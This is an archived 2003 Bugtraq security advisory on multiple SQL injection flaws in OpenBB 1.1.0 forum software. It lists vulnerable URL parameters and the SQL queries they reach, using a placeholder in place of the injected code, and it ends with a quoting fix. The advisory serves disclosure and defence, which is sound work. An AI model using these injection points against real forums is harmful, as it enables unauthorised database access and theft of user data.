lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <200304221200.23320.ripe@7a69ezine.org>
Date: Fri, 25 Apr 2003 09:22:48 +0200
From: Albert Puigsech Galicia <ripe@...9ezine.org>
To: bugtraq@...urityfocus.com
Subject: Multiple SQL injection on OpenBB forums


/-----------------------------------------------------------------------------\
|                             7 A 6 9 - A d v                          C: 008
|-----------------------------------------------------------------------------|
|
|                     [ SQL injection on OpenBB forums ]
|
\-----------------------------------------------------------------------------/
                                                                | 22/04/2003 |
                                                                \------------/

Data.
-----

        + Typo:         SQL injection

        + Software:     OpenBB.

        + Verions:      1.1.0 (curent version).

        + Exploit:      Yes.

        + Autor:        Albert Puigsech Galicia

        + Contact:      ripe@...9ezine.org




Introduction.
-------------

        OpenBB is a complet forum writen in PHP language, that uses MySQL
database. More information about this software can be readed on openBB oficial
website; http://www.openbb.co.uk.


Description.
------------

        There are multiple SQL injection vulnerabilities on OpenBB's current
version.

        All PHP scripts that makes an SQL query, including numeric value
introduced by web user allow to inject our own SQL code inside.



Explotation.
------------

        Is posible, as in other similar cases of SQL injection, to extract
information from database. If vulnerable host are using MySQL 3 we must to
use LIKE method(*), but if MySQL's version 4 are used we are allowed to use
UNION, that make exploit more easy.

        To exploit this vulnerability only need to add an space (or %20)
behind the number, and next our SQL alteration.

        Some examples of this SQL injection on OpenBB may be this. The
examples contains the url to exploit it and the SQL query done (look at
'<something>', that it's our own SQL code):


        http://vulnerable/index.php?CID=1 <something>

        SELECT guest, forumid, title, lastthread, lastposter, lastposterid,
        lastthreadid, lastpost, moderators, description, type, postcount,
        threadcount, forumkey FROM obb_forum_display WHERE
	parent = 3 <something> ORDER BY displayorder


        http://vulnerable/board.php?FID=2 <something>

        SELECT title, threadcount, type, hidden_topics, forumkey FROM
        obb_forum_display WHERE forumid = 2 <something>


        http://vulnerable/member.php?action=profile&UID=1 <something>

        SELECT * FROM obb_customvalues v INNER JOIN obb_custompermis p ON
        p.fieldid = v.fieldid INNER JOIN obb_customfields f on
        f.fieldid=v.fieldid WHERE v.userid=1 <something> AND
	p.canviewothers='t' AND p.groupid='0'



Patch.
------

        There is no a patch yet, but the problem is solved if you put inverted
commas on every number variable included on SQL query or check if the variable
is realy a number.


--
>====================================
> Albert Puigsech Galicia (7a69)
>
> http://ripe.7a69ezine.org
>====================================

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ